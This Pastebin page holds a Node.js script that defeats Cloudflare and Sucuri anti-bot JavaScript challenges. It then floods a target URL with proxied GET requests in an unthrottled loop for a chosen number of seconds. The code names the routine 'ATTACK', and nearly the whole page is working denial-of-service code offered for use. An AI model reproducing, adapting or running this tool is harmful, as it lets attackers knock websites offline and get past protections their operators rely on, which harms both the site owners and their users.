SHARE
TWEET

[CLOUDFLARE JS Bypass Proxyless]

xB4ckdoorREAL Aug 25th, 2019 125 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /**
  2. // www.b4ckdoorarchive.host - Cloudflare JS BYPASS
  3. // Usage : node cfbypass [host] [time] [list.txt (Your proxy list)]
  4. process.on('uncaughtException', (err) => {});
  5. process.on('unhandledRejection', (err) => {});
  6. var vm = require('vm');
  7. var requestModule = require('request');
  8. var jar = requestModule.jar();
  9. var fs = require('fs');
  10. var proxies = fs.readFileSync(process.argv[4], 'utf-8').replace(/\r/g, '').split('\n');
  11.  
  12. function arrremove(arr, what) {
  13.     var found = arr.indexOf(what);
  14.  
  15.     while (found !== -1) {
  16.         arr.splice(found, 1);
  17.         found = arr.indexOf(what);
  18.     }
  19. }
  20.  
  21. var request = requestModule.defaults({
  22.         jar: jar
  23.     }),
  24.     UserAgent = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
  25.     Timeout = 6000,
  26.     WAF = true,
  27.     cloudscraper = {};
  28.  
  29.  
  30.  
  31. var cookies = [];
  32.  
  33. cloudscraper.get = function(url, callback, headers) {
  34.     performRequest({
  35.         method: 'GET',
  36.         url: url,
  37.         headers: headers
  38.     }, callback);
  39. };
  40.  
  41. cloudscraper.post = function(url, body, callback, headers) {
  42.     var data = '',
  43.         bodyType = Object.prototype.toString.call(body);
  44.  
  45.     if (bodyType === '[object String]') {
  46.         data = body;
  47.     } else if (bodyType === '[object Object]') {
  48.         data = Object.keys(body).map(function(key) {
  49.             return key + '=' + body[key];
  50.         }).join('&');
  51.     }
  52.  
  53.     headers = headers || {};
  54.     headers['Content-Type'] = headers['Content-Type'] || 'application/x-www-form-urlencoded; charset=UTF-8';
  55.     headers['Content-Length'] = headers['Content-Length'] || data.length;
  56.  
  57.     performRequest({
  58.         method: 'POST',
  59.         body: data,
  60.         url: url,
  61.         headers: headers
  62.     }, callback);
  63. }
  64.  
  65. cloudscraper.request = function(options, callback) {
  66.     performRequest(options, callback);
  67. }
  68.  
  69. function performRequest(options, callback) {
  70.     var method;
  71.     options = options || {};
  72.     options.headers = options.headers || {};
  73.  
  74.     options.headers['Cache-Control'] = options.headers['Cache-Control'] || 'private';
  75.     options.headers['Accept'] = options.headers['Accept'] || 'application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5';
  76.  
  77.    makeRequest = requestMethod(options.method);
  78.  
  79.    if ('encoding' in options) {
  80.        options.realEncoding = options.encoding;
  81.    } else {
  82.        options.realEncoding = 'utf8';
  83.    }
  84.    options.encoding = null;
  85.  
  86.    if (!options.url || !callback) {
  87.        throw new Error('To perform request, define both url and callback');
  88.    }
  89.  
  90.    options.headers['User-Agent'] = options.headers['User-Agent'] || UserAgent;
  91.  
  92.    makeRequest(options, function(error, response, body) {
  93.        var validationError;
  94.        var stringBody;
  95.  
  96.        if (error || !body || !body.toString) {
  97.            return callback({
  98.                errorType: 0,
  99.                error: error
  100.            }, body, response);
  101.        }
  102.  
  103.        stringBody = body.toString('utf8');
  104.  
  105.        if (validationError = checkForErrors(error, stringBody)) {
  106.            return callback(validationError, body, response);
  107.        }
  108.  
  109.        if (stringBody.indexOf('a = document.getElementById(\'jschl-answer\');') !== -1) {
  110.             setTimeout(function() {
  111.                 return solveChallenge(response, stringBody, options, callback);
  112.             }, Timeout);
  113.         } else if (stringBody.indexOf('You are being redirected') !== -1 ||
  114.             stringBody.indexOf('sucuri_cloudproxy_js') !== -1) {
  115.             setCookieAndReload(response, stringBody, options, callback);
  116.         } else {
  117.             processResponseBody(options, error, response, body, callback);
  118.         }
  119.     });
  120. }
  121.  
  122. function checkForErrors(error, body) {
  123.     var match;
  124.  
  125.     if (error) {
  126.         return {
  127.             errorType: 0,
  128.             error: error
  129.         };
  130.     }
  131.  
  132.     if (body.indexOf('why_captcha') !== -1 || /cdn-cgi\/l\/chk_captcha/i.test(body)) {
  133.         return {
  134.             errorType: 1
  135.         };
  136.     }
  137.  
  138.     match = body.match(/<\w+\s+class="cf-error-code">(.*)<\/\w+>/i);
  139.  
  140.     if (match) {
  141.         return {
  142.             errorType: 2,
  143.             error: parseInt(match[1])
  144.         };
  145.     }
  146.  
  147.     return false;
  148. }
  149.  
  150.  
  151. function solveChallenge(response, body, options, callback) {
  152.     var challenge = body.match(/name="jschl_vc" value="(\w+)"/),
  153.         host = response.request.host,
  154.         makeRequest = requestMethod(options.method),
  155.         jsChlVc,
  156.         answerResponse,
  157.         answerUrl;
  158.  
  159.     if (!challenge) {
  160.         return callback({
  161.             errorType: 3,
  162.             error: 'I cant extract challengeId (jschl_vc) from page'
  163.         }, body, response);
  164.     }
  165.  
  166.     jsChlVc = challenge[1];
  167.  
  168.     challenge = body.match(/getElementById\('cf-content'\)[\s\S]+?setTimeout.+?\r?\n([\s\S]+?a\.value =.+?)\r?\n/i);
  169.  
  170.     if (!challenge) {
  171.         return callback({
  172.             errorType: 3,
  173.             error: 'I cant extract method from setTimeOut wrapper'
  174.         }, body, response);
  175.     }
  176.  
  177.     challenge_pass = body.match(/name="pass" value="(.+?)"/)[1];
  178.  
  179.     challenge = challenge[1];
  180.  
  181.     challenge = challenge.replace(/a\.value =(.+?) \+ .+?;/i, '$1');
  182.  
  183.     challenge = challenge.replace(/\s{3,}[a-z](?: = |\.).+/g, '');
  184.     challenge = challenge.replace(/'; \d+'/g, '');
  185.  
  186.     try {
  187.         answerResponse = {
  188.             'jschl_vc': jsChlVc,
  189.             'jschl_answer': (eval(challenge) + response.request.host.length),
  190.             'pass': challenge_pass
  191.         };
  192.     } catch (err) {
  193.         return callback({
  194.             errorType: 3,
  195.             error: 'Error occurred during evaluation: ' + err.message
  196.         }, body, response);
  197.     }
  198.  
  199.     answerUrl = response.request.uri.protocol + '//' + host + '/cdn-cgi/l/chk_jschl';
  200.  
  201.     options.headers['Referer'] = response.request.uri.href;
  202.     options.url = answerUrl;
  203.     options.qs = answerResponse;
  204.  
  205.     makeRequest(options, function(error, response, body) {
  206.  
  207.         if (error) {
  208.             return callback({
  209.                 errorType: 0,
  210.                 error: error
  211.             }, response, body);
  212.         }
  213.  
  214.         if (response.statusCode === 302) {
  215.             options.url = response.headers.location;
  216.             delete options.qs;
  217.             makeRequest(options, function(error, response, body) {
  218.                 processResponseBody(options, error, response, body, callback);
  219.             });
  220.         } else {
  221.             processResponseBody(options, error, response, body, callback);
  222.         }
  223.     });
  224. }
  225.  
  226. function setCookieAndReload(response, body, options, callback) {
  227.     var challenge = body.match(/S='([^']+)'/);
  228.     var makeRequest = requestMethod(options.method);
  229.  
  230.     if (!challenge) {
  231.         return callback({
  232.             errorType: 3,
  233.             error: 'I cant extract cookie generation code from page'
  234.         }, body, response);
  235.     }
  236.  
  237.     var base64EncodedCode = challenge[1];
  238.     var cookieSettingCode = new Buffer(base64EncodedCode, 'base64').toString('ascii');
  239.  
  240.     var sandbox = {
  241.         location: {
  242.             reload: function() {}
  243.         },
  244.         document: {}
  245.     };
  246.     vm.runInNewContext(cookieSettingCode, sandbox);
  247.     try {
  248.         cookies.push(sandbox.document.cookie);
  249.         jar.setCookie(sandbox.document.cookie, response.request.uri.href, {
  250.             ignoreError: true
  251.         });
  252.     } catch (err) {
  253.         return callback({
  254.             errorType: 3,
  255.             error: 'Error occurred during evaluation: ' + err.message
  256.         }, body, response);
  257.     }
  258.  
  259.     makeRequest(options, function(error, response, body) {
  260.         if (error) {
  261.             return callback({
  262.                 errorType: 0,
  263.                 error: error
  264.             }, response, body);
  265.         }
  266.         processResponseBody(options, error, response, body, callback);
  267.     });
  268. }
  269.  
  270. function requestMethod(method) {
  271.     method = method.toUpperCase();
  272.  
  273.     return method === 'POST' ? request.post : request.get;
  274. }
  275.  
  276. function processResponseBody(options, error, response, body, callback) {
  277.     if (typeof options.realEncoding === 'string') {
  278.         body = body.toString(options.realEncoding);
  279.         if (validationError = checkForErrors(error, body)) {
  280.             return callback(validationError, response, body);
  281.         }
  282.     }
  283.  
  284.  
  285.     callback(error, response, body);
  286. }
  287.  
  288. var ATTACK = {
  289.     cfbypass(method, url, proxy) {
  290.         performRequest({
  291.             method: method,
  292.             proxy: 'http://' + proxy,
  293.             url: url
  294.         }, function(err, response, body) {
  295.             console.log(err, response.statusCode);        
  296.         });
  297.     }
  298. }
  299.  
  300. setTimeout(function() {
  301.     process.exit(1);
  302. }, process.argv[3] * 1000);
  303.  
  304. setInterval(function() {
  305.     ATTACK.cfbypass('GET', process.argv[2], proxies[Math.floor(Math.random() * proxies.length)]);
  306. });
  307.  
  308. console.log("GET Test has been sent to %s for %s seconds", process.argv[2], process.argv[3]);
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top